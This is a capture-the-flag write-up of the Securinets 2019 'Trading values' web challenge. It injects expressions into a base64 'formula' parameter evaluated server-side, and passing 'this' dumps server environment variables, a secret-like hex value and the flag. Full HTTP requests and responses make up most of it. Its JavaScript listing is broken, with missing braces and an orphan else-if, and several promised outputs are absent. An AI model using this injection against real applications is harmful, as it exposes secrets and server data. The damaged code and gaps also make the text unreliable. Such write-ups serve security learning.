# Securinets Prequals CTF 2019 – Trading values
* **Category:** Web
* **Points:** 989
## Challenge
> N00B developers are an easy target. Try to exploit the application feature to get the hidden flag.
> https://web1.ctfsecurinets.com/
> Author:TheEmperors
## Solution
The webiste plots some values on a graph. Here the JavaScript of the widget.
Highcharts.chart('container', {
chart: {
type: 'spline',
animation: Highcharts.svg, // don't animate in old IE
marginRight: 10,
events: {
load: function () {
// set up the updating of the chart each second
var series = this.series[0];
var formula="KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc=";
setInterval(function () {
$.get( "/default", { "formula": formula, "values":{"v1": "STC","v2":"PLA","v3":"SDF","v4":"OCK"} } )
.done(function( data ) {
var x = (new Date()).getTime(), // current time
y = parseInt(data);
else if(y>1000 && y<10000)formula="KHYxLm1way12MS5kcmYqKHYxLm1way8xMDApLXYxLmRyZikvKHYxLmF2ZyowLjMpLSh2Mi5hdmcvKCg0LzMpKnYyLm1kcyt2Mi5kbXEqMTAwKSkrKHYzLnBkaSt2My5wZGkrMy8yKig1KnYzLnJhciktNjkqdjMuZ2RwKSsxLjcqKHY0Lm11bSp2NC5kYWQpKjE2LjUqdjQuYXZn";
else if(y>10000 && y<100000)formula="KHYxLm1way12MS5kcmYqKHYxLm1way8wLjEpLXYxLmRyZikvKHYxLmF2ZyowLjgpLSh2Mi5hdmcvKCgxLzIpKnYyLm1kcy0yNC92Mi5kbXEqMTApKSsodjMucGRpLXYzLnBkaSszLzIqKDIvNSp2My5yYXIpLTY2KnYzLmdkcCkqNy41Lyh2NC5tdW0vdjQuZGFkKSo2LjUvdjQuYXZn";
else formula="KHYxLm1way12MS5kcmYqKHYxLm1way8wLjA2KS12MS5kcmYpLyh2MS5hdmcqMC4yNSkrKHYyLmF2Zy8oKDMvMikvdjIubWRzLTg0L3YyLmRtcSoxOSkpLSh2My5wZGktdjMucGRpKzkvMiooMTIvNyp2My5yYXIpLTY2KnYzLmdkcCkqMC41Lyh2NC5tdW0qKnY0LmRhZCkqMC4zOS92NC5hdmcqKjI=";
series.addPoint([x, y], true, true);
}, 1000);
time: {
useUTC: false
title: {
text: 'Live Securinets Trading values'
xAxis: {
type: 'datetime',
tickPixelInterval: 300
yAxis: {
title: {
text: 'Value'
plotLines: [{
value: 0,
width: 1,
color: '#808080'
tooltip: {
headerFormat: '{series.name}
pointFormat: '{point.x:%Y-%m-%d %H:%M:%S}
legend: {
enabled: false
exporting: {
enabled: false
series: [{
name: 'Random data',
data: (function () {
// generate an array of random data
var data = [],
time = (new Date()).getTime(),
for (i = -19; i <= 0; i += 1) {
x: time + i * 1000,
y: Math.random()
return data;
The base64 decoded formulas are the following.
The sent request is a HTTP GET with a base64 encoded formula and a series of values to execute on the server.
URL-decoded values are the following.
The complete request-response process is like the following.
GET /default?formula=KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc%3D&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK HTTP/1.1
Host: web1.ctfsecurinets.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 24 Mar 2019 09:21:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Cache-Control: private, must-revalidate
pragma: no-cache
expires: -1
Content-Length: 15
Encoding a custom operation like `1+1` in base64 (`DQoxKzE=`) and sending as formula, will produce a result.
GET /default?formula=DQoxKzE=&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK HTTP/1.1
Host: web1.ctfsecurinets.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 24 Mar 2019 09:22:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Cache-Control: private, must-revalidate
pragma: no-cache
expires: -1
Content-Length: 1
Passing a random string, like `aaa` in base64 (`YWFh`), will give an interesting error.
GET /default?formula=YWFh&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK HTTP/1.1
Host: web1.ctfsecurinets.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 24 Mar 2019 09:26:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Cache-Control: private, must-revalidate
pragma: no-cache
expires: -1
Content-Length: 67
Variable "aaa" is not valid around position 1 for expression `aaa`.
Hence the formula is executed server side with an expression parser (i.e. https://github.com/symfony/expression-language).
Passing directly the name of the variable, will print all the object, e.g. passing `v1` (`djE=`) will give the following.
GET /default?formula=djE=&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK HTTP/1.1
Host: web1.ctfsecurinets.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 500 Internal Server Error
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 24 Mar 2019 09:42:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 144
object(App\Entity\STC)#233 (4) {
So, values are objects of classes defined in a classpath. Adding a new value `v0`, setting it to `this` and trying to print it, will give you tons of information.
GET /default?formula=djA=&values[v0]=this&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK HTTP/1.1
Host: web1.ctfsecurinets.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Inside the output, you will find the flag into an environment variable.
object(Symfony\Component\HttpFoundation\ServerBag)#10 (1) {
array(42) {
string(8) "www-data"
string(8) "/var/www"
string(1) "1"
string(13) "gzip, deflate"
string(35) "it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3"
string(74) "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
string(78) "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
string(5) "close"
string(14) ""
string(12) "x.x.x.x"
string(5) "https"
string(22) "web1.ctfsecurinets.com"
string(13) ""
string(51) "/var/www/html/epreuve/symfony_task/public/index.php"
string(3) "200"
string(1) "_"
string(2) "80"
string(10) ""
string(5) "57272"
string(10) ""
string(12) "nginx/1.10.3"
string(7) "CGI/1.1"
string(4) "http"
string(8) "HTTP/1.0"
string(41) "/var/www/html/epreuve/symfony_task/public"
string(10) "/index.php"
string(97) "/default?formula=djA=&values[v0]=this&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK"
string(10) "/index.php"
string(0) ""
string(0) ""
string(3) "GET"
string(88) "formula=djA=&values[v0]=this&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK"
string(9) "RESPONDER"
string(10) "/index.php"
string(4) "prod"
string(32) "44705a2f4fc85d70df5403ac8c7649fd"
string(47) "Securinets{T00_Ea5y_T0_U5e_This_Local_variable}"
string(16) "null://localhost"
string(1) "0"
The flag is the following.